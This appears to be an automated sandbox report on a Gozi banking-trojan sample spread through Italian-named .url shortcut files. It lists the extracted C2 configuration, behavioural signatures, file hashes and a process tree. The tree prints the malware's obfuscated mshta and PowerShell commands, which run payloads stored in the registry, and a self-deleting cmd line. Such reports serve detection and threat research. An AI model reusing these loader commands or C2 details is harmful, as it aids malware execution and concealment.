Overview
overview
10Static
static
1url/Ammini...ne.url
windows10-1703-x64
10url/Ammini...ne.url
windows10-2004-x64
10url/Azienda.url
windows10-1703-x64
10url/Azienda.url
windows10-2004-x64
10url/Cliente.url
windows10-1703-x64
10url/Cliente.url
windows10-2004-x64
10url/Documenti.url
windows10-1703-x64
10url/Documenti.url
windows10-2004-x64
10url/Informazioni.url
windows10-1703-x64
10url/Informazioni.url
windows10-2004-x64
10url/dettagli.url
windows10-1703-x64
10url/dettagli.url
windows10-2004-x64
10url/inform.url
windows10-1703-x64
10url/inform.url
windows10-2004-x64
10url/modulo.url
windows10-1703-x64
10url/modulo.url
windows10-2004-x64
10url/processo.url
windows10-1703-x64
10url/processo.url
windows10-2004-x64
10url/sistema.url
windows10-1703-x64
10url/sistema.url
windows10-2004-x64
10Analysis
-
max time kernel
156s -
max time network
166s -
platform
windows10-1703_x64 -
resource
win10-20230915-en -
resource tags
arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system -
submitted
13-10-2023 01:40
Static task
static1
Behavioral task
behavioral1
Sample
url/Amministrazione.url
Resource
win10-20230915-en
Behavioral task
behavioral2
Sample
url/Amministrazione.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
url/Azienda.url
Resource
win10-20230915-en
Behavioral task
behavioral4
Sample
url/Azienda.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
url/Cliente.url
Resource
win10-20230915-en
Behavioral task
behavioral6
Sample
url/Cliente.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral7
Sample
url/Documenti.url
Resource
win10-20230915-en
Behavioral task
behavioral8
Sample
url/Documenti.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral9
Sample
url/Informazioni.url
Resource
win10-20230915-en
Behavioral task
behavioral10
Sample
url/Informazioni.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral11
Sample
url/dettagli.url
Resource
win10-20230831-en
Behavioral task
behavioral12
Sample
url/dettagli.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral13
Sample
url/inform.url
Resource
win10-20230915-en
Behavioral task
behavioral14
Sample
url/inform.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral15
Sample
url/modulo.url
Resource
win10-20230915-en
Behavioral task
behavioral16
Sample
url/modulo.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral17
Sample
url/processo.url
Resource
win10-20230915-en
Behavioral task
behavioral18
Sample
url/processo.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral19
Sample
url/sistema.url
Resource
win10-20230915-en
General
-
Target
url/Cliente.url
-
Size
194B
-
MD5
0da2f6812c1bc76eaa25be1e6a2eaf4c
-
SHA1
e4b237e5f7bb7b96e9bfb43c126541fc892d3b0a
-
SHA256
0042887574aae1f954f0459b9448c0fa4501bb8719843940315d466645da9a7b
-
SHA512
a5495580fae00444b4edbff6894e1e302025ddff295a26fe519bc229724d3961646afb1cece2be892b19840035152a937fa3f7910e4fe04adea751eb319d96cb
Malware Config
Extracted
gozi
Extracted
gozi
5050
fotexion.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 8 4236 rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 4236 rundll32.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 4460 set thread context of 3296 4460 powershell.exe Explorer.EXE PID 3296 set thread context of 3840 3296 Explorer.EXE RuntimeBroker.exe PID 3296 set thread context of 4792 3296 Explorer.EXE cmd.exe PID 4792 set thread context of 4192 4792 cmd.exe PING.EXE PID 3296 set thread context of 1436 3296 Explorer.EXE WinMail.exe PID 3296 set thread context of 700 3296 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000_Classes\Local Settings rundll32.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 4192 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exepowershell.exeExplorer.EXEpid process 4236 rundll32.exe 4236 rundll32.exe 4460 powershell.exe 4460 powershell.exe 4460 powershell.exe 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE 3296 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3296 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 4460 powershell.exe 3296 Explorer.EXE 3296 Explorer.EXE 4792 cmd.exe 3296 Explorer.EXE 3296 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 4460 powershell.exe Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE Token: SeShutdownPrivilege 3296 Explorer.EXE Token: SeCreatePagefilePrivilege 3296 Explorer.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
rundll32.exepid process 1112 rundll32.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3296 Explorer.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
rundll32.execontrol.exerundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 1112 wrote to memory of 4588 1112 rundll32.exe control.exe PID 1112 wrote to memory of 4588 1112 rundll32.exe control.exe PID 4588 wrote to memory of 4492 4588 control.exe rundll32.exe PID 4588 wrote to memory of 4492 4588 control.exe rundll32.exe PID 4492 wrote to memory of 4236 4492 rundll32.exe rundll32.exe PID 4492 wrote to memory of 4236 4492 rundll32.exe rundll32.exe PID 4492 wrote to memory of 4236 4492 rundll32.exe rundll32.exe PID 2480 wrote to memory of 4460 2480 mshta.exe powershell.exe PID 2480 wrote to memory of 4460 2480 mshta.exe powershell.exe PID 4460 wrote to memory of 5012 4460 powershell.exe csc.exe PID 4460 wrote to memory of 5012 4460 powershell.exe csc.exe PID 5012 wrote to memory of 952 5012 csc.exe cvtres.exe PID 5012 wrote to memory of 952 5012 csc.exe cvtres.exe PID 4460 wrote to memory of 3484 4460 powershell.exe csc.exe PID 4460 wrote to memory of 3484 4460 powershell.exe csc.exe PID 3484 wrote to memory of 3772 3484 csc.exe cvtres.exe PID 3484 wrote to memory of 3772 3484 csc.exe cvtres.exe PID 4460 wrote to memory of 3296 4460 powershell.exe Explorer.EXE PID 4460 wrote to memory of 3296 4460 powershell.exe Explorer.EXE PID 4460 wrote to memory of 3296 4460 powershell.exe Explorer.EXE PID 4460 wrote to memory of 3296 4460 powershell.exe Explorer.EXE PID 3296 wrote to memory of 3840 3296 Explorer.EXE RuntimeBroker.exe PID 3296 wrote to memory of 3840 3296 Explorer.EXE RuntimeBroker.exe PID 3296 wrote to memory of 3840 3296 Explorer.EXE RuntimeBroker.exe PID 3296 wrote to memory of 3840 3296 Explorer.EXE RuntimeBroker.exe PID 3296 wrote to memory of 4792 3296 Explorer.EXE cmd.exe PID 3296 wrote to memory of 4792 3296 Explorer.EXE cmd.exe PID 3296 wrote to memory of 4792 3296 Explorer.EXE cmd.exe PID 3296 wrote to memory of 4792 3296 Explorer.EXE cmd.exe PID 3296 wrote to memory of 4792 3296 Explorer.EXE cmd.exe PID 4792 wrote to memory of 4192 4792 cmd.exe PING.EXE PID 4792 wrote to memory of 4192 4792 cmd.exe PING.EXE PID 4792 wrote to memory of 4192 4792 cmd.exe PING.EXE PID 4792 wrote to memory of 4192 4792 cmd.exe PING.EXE PID 3296 wrote to memory of 1436 3296 Explorer.EXE WinMail.exe PID 3296 wrote to memory of 1436 3296 Explorer.EXE WinMail.exe PID 3296 wrote to memory of 1436 3296 Explorer.EXE WinMail.exe PID 4792 wrote to memory of 4192 4792 cmd.exe PING.EXE PID 3296 wrote to memory of 1436 3296 Explorer.EXE WinMail.exe PID 3296 wrote to memory of 1436 3296 Explorer.EXE WinMail.exe PID 3296 wrote to memory of 700 3296 Explorer.EXE cmd.exe PID 3296 wrote to memory of 700 3296 Explorer.EXE cmd.exe PID 3296 wrote to memory of 700 3296 Explorer.EXE cmd.exe PID 3296 wrote to memory of 700 3296 Explorer.EXE cmd.exe PID 3296 wrote to memory of 700 3296 Explorer.EXE cmd.exe PID 3296 wrote to memory of 700 3296 Explorer.EXE cmd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\url\Cliente.url2⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl",3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl",4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl",5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>O8ie='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(O8ie).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\C007E561-1FD8-F246-A9F4-C346ED68A7DA\\\GlobalPlay'));if(!window.flag)close()</script>"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xmocyoxeca -value gp; new-alias -name uwdhgkyjvg -value iex; uwdhgkyjvg ([System.Text.Encoding]::ASCII.GetString((xmocyoxeca "HKCU:Software\AppDataLow\Software\Microsoft\C007E561-1FD8-F246-A9F4-C346ED68A7DA").VirtualActive))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\123q5kxh\123q5kxh.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFEED.tmp" "c:\Users\Admin\AppData\Local\Temp\123q5kxh\CSCD8F288A0F8FC42ADA1EFBAAB9E33C6D.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nhqex5fl\nhqex5fl.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF99.tmp" "c:\Users\Admin\AppData\Local\Temp\nhqex5fl\CSC869BF5DEA9C2407C9078EDC455DF949.TMP"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE2⤵
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cplFilesize
206KB
MD572e2a5c797954e895a41be5b20f867b2
SHA1419aacfb3ccea9b08277bcc9405054fa4238a597
SHA256858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
SHA51277be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
-
C:\Users\Admin\AppData\Local\Temp\123q5kxh\123q5kxh.dllFilesize
3KB
MD5db160ce78cc8849b45f430deb0dd360d
SHA129c383343dfd9c2503730d23d1290db329e4db6f
SHA256d1ad2e0997219437a0fb45e0c8b017900796c98bd9dbe27fb9ba0dbf36f72b70
SHA512ba0aba26e7ced18ead1e12bf6928afa3f20548870687dad5a37cb81f667f04f9a94883fc4767e532878f2a60ac5f1e2b98383191fe7f41e0053877e1d0001376
-
C:\Users\Admin\AppData\Local\Temp\RESFEED.tmpFilesize
1KB
MD5583c116dd357c8c69518ddfe993d3a64
SHA10482e0559132492f83681ebe7e6654d42957882f
SHA256befcbd2ea572d67352bea5da07f32de7d3097bc011217a263c818dfd5782b187
SHA5123142ad01bcde4bdee22c367241df94ff7248876d342eca783dd0cedae0ab728bd02994d30d64ac51cb240814a12d11c16f8ea625072113bc420a5551d536848f
-
C:\Users\Admin\AppData\Local\Temp\RESFF99.tmpFilesize
1KB
MD58ce6684665928dddf230c12165e3efbc
SHA1e9eb46ffd29ab7614854c414ba268faddcc6aefc
SHA2560c37d612355061ea234b9b6d9b56d386b75a449437402da66d8882bb02e42d5a
SHA512b1f68d30fad807dc2c3b46d9e710d23902f3862a5991ccb55f9b263ec06d40dc2b293480cf9ba6d3b9cb0d1e92c1b199b2134ff947080bddecdf7c34602b52a9
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e43mj5bz.wbh.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Local\Temp\nhqex5fl\nhqex5fl.dllFilesize
3KB
MD5ffc4692689dfe0b0bc47e197c0740016
SHA1327db1dadfdda687629bc64db10de2988cdb8fff
SHA256ea658b845aa888818d511da4d4c2917ff1c5ef1c3c3cc2cb36a99eb7e53e1c1c
SHA51229077450cb176d7b2bbbc61e552091c3fb4c9b7a94cd22fc0ddc524dc0e0eb61c1669316cc5da4153d55f9480d51cd31dd8a47d5d24731f02a2a427591b31bd3
-
\??\c:\Users\Admin\AppData\Local\Temp\123q5kxh\123q5kxh.0.csFilesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
\??\c:\Users\Admin\AppData\Local\Temp\123q5kxh\123q5kxh.cmdlineFilesize
369B
MD5bd06dc5b128da823d3627ca45590483f
SHA10eeca05b5d3015f70a1918916dda46d996940483
SHA2565a4852c3ee746929c59ad71f75beb9938bc9d8cc2fb73e3f8929b7477a2e6c08
SHA51281906054b13421fbee1e7dd06a1df07fe0da8820cc06c40300aa5745a9356036a3ac8d65208b3af4c8d7e450baee667b75097c2a197a083c83110c8c2f5b9a2c
-
\??\c:\Users\Admin\AppData\Local\Temp\123q5kxh\CSCD8F288A0F8FC42ADA1EFBAAB9E33C6D.TMPFilesize
652B
MD501d748f1649d191d7071e06196b79300
SHA1250d50fa519143d3e75b1e605c7f45c276cc1d89
SHA2567693d16f1acfa7f35b877e99d313d84c9a5fa9a42721888c17367f993ff92eb5
SHA5121fe0ad376ec3ad830b4a1f2ef4fb87f316c166fbda20f15a623c747f1b03656e3df7f9c40cb270674365d7250723b2d78307167f24c71d7c9e69c2c3dc687895
-
\??\c:\Users\Admin\AppData\Local\Temp\nhqex5fl\CSC869BF5DEA9C2407C9078EDC455DF949.TMPFilesize
652B
MD5a983f9fbfe68e9385733cee793f78d23
SHA1d7eda52ec169c6de71e44e698a3e4b4d3aeb226e
SHA2565cfed296c0a288354ea200729bff96fafc847cc19483c4aee7c9d42e94f60757
SHA5123ee38b59e53252dee5400924271ac5478cb209882018e56bb691621006639b5b7417d0aa1ba3d1e2cbfc909925dbc4a2c4b242b5631d0e57ee7d612be7be9b91
-
\??\c:\Users\Admin\AppData\Local\Temp\nhqex5fl\nhqex5fl.0.csFilesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
\??\c:\Users\Admin\AppData\Local\Temp\nhqex5fl\nhqex5fl.cmdlineFilesize
369B
MD57e78599de5869c89b3e678da82bcff6e
SHA1fd69b3c68b5f1606c08c106e989acfc236fa6202
SHA256eeae0a489d983887916adb2990856b15799c39c327a74fe446c44266071da600
SHA51295032f3603be963eda9d3fa00b0f14d5c6102736daa4c07b1d91ef16ff2630df7aca1d075a8ae4d92ef2c2c45ee06213e5d1cdbb949f0cdc7bc4047041eebf1b
-
\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cplFilesize
206KB
MD572e2a5c797954e895a41be5b20f867b2
SHA1419aacfb3ccea9b08277bcc9405054fa4238a597
SHA256858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
SHA51277be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
-
memory/700-141-0x0000000003300000-0x0000000003398000-memory.dmpFilesize
608KB
-
memory/700-134-0x0000000003300000-0x0000000003398000-memory.dmpFilesize
608KB
-
memory/700-137-0x0000000000E40000-0x0000000000E41000-memory.dmpFilesize
4KB
-
memory/1436-129-0x0000023B21F40000-0x0000023B21FE4000-memory.dmpFilesize
656KB
-
memory/1436-120-0x0000023B21F40000-0x0000023B21FE4000-memory.dmpFilesize
656KB
-
memory/1436-121-0x0000023B21F10000-0x0000023B21F11000-memory.dmpFilesize
4KB
-
memory/3296-135-0x0000000002F60000-0x0000000003004000-memory.dmpFilesize
656KB
-
memory/3296-76-0x0000000002F60000-0x0000000003004000-memory.dmpFilesize
656KB
-
memory/3296-77-0x0000000001090000-0x0000000001091000-memory.dmpFilesize
4KB
-
memory/3840-142-0x000001D82C590000-0x000001D82C634000-memory.dmpFilesize
656KB
-
memory/3840-93-0x000001D82C590000-0x000001D82C634000-memory.dmpFilesize
656KB
-
memory/3840-94-0x000001D82A060000-0x000001D82A061000-memory.dmpFilesize
4KB
-
memory/4192-145-0x000001E1CB190000-0x000001E1CB234000-memory.dmpFilesize
656KB
-
memory/4192-115-0x000001E1CAEF0000-0x000001E1CAEF1000-memory.dmpFilesize
4KB
-
memory/4192-114-0x000001E1CB190000-0x000001E1CB234000-memory.dmpFilesize
656KB
-
memory/4236-6-0x00000000048A0000-0x00000000048C9000-memory.dmpFilesize
164KB
-
memory/4236-7-0x00000000048E0000-0x00000000048EE000-memory.dmpFilesize
56KB
-
memory/4236-8-0x0000000004D50000-0x0000000004D5D000-memory.dmpFilesize
52KB
-
memory/4236-11-0x00000000048E0000-0x00000000048EE000-memory.dmpFilesize
56KB
-
memory/4236-112-0x00000000048E0000-0x00000000048EE000-memory.dmpFilesize
56KB
-
memory/4460-70-0x0000023275130000-0x0000023275138000-memory.dmpFilesize
32KB
-
memory/4460-56-0x000002325CCE0000-0x000002325CCE8000-memory.dmpFilesize
32KB
-
memory/4460-19-0x00000232750B0000-0x00000232750D2000-memory.dmpFilesize
136KB
-
memory/4460-91-0x0000023275140000-0x000002327517D000-memory.dmpFilesize
244KB
-
memory/4460-90-0x00007FFC7FBF0000-0x00007FFC805DC000-memory.dmpFilesize
9.9MB
-
memory/4460-74-0x0000023275140000-0x000002327517D000-memory.dmpFilesize
244KB
-
memory/4460-72-0x00000232751A0000-0x00000232751B0000-memory.dmpFilesize
64KB
-
memory/4460-21-0x00007FFC7FBF0000-0x00007FFC805DC000-memory.dmpFilesize
9.9MB
-
memory/4460-25-0x00000232753B0000-0x0000023275426000-memory.dmpFilesize
472KB
-
memory/4460-24-0x00000232751A0000-0x00000232751B0000-memory.dmpFilesize
64KB
-
memory/4460-23-0x00000232751A0000-0x00000232751B0000-memory.dmpFilesize
64KB
-
memory/4792-105-0x000001C7A5560000-0x000001C7A5604000-memory.dmpFilesize
656KB
-
memory/4792-144-0x000001C7A5560000-0x000001C7A5604000-memory.dmpFilesize
656KB
-
memory/4792-106-0x000001C7A52A0000-0x000001C7A52A1000-memory.dmpFilesize
4KB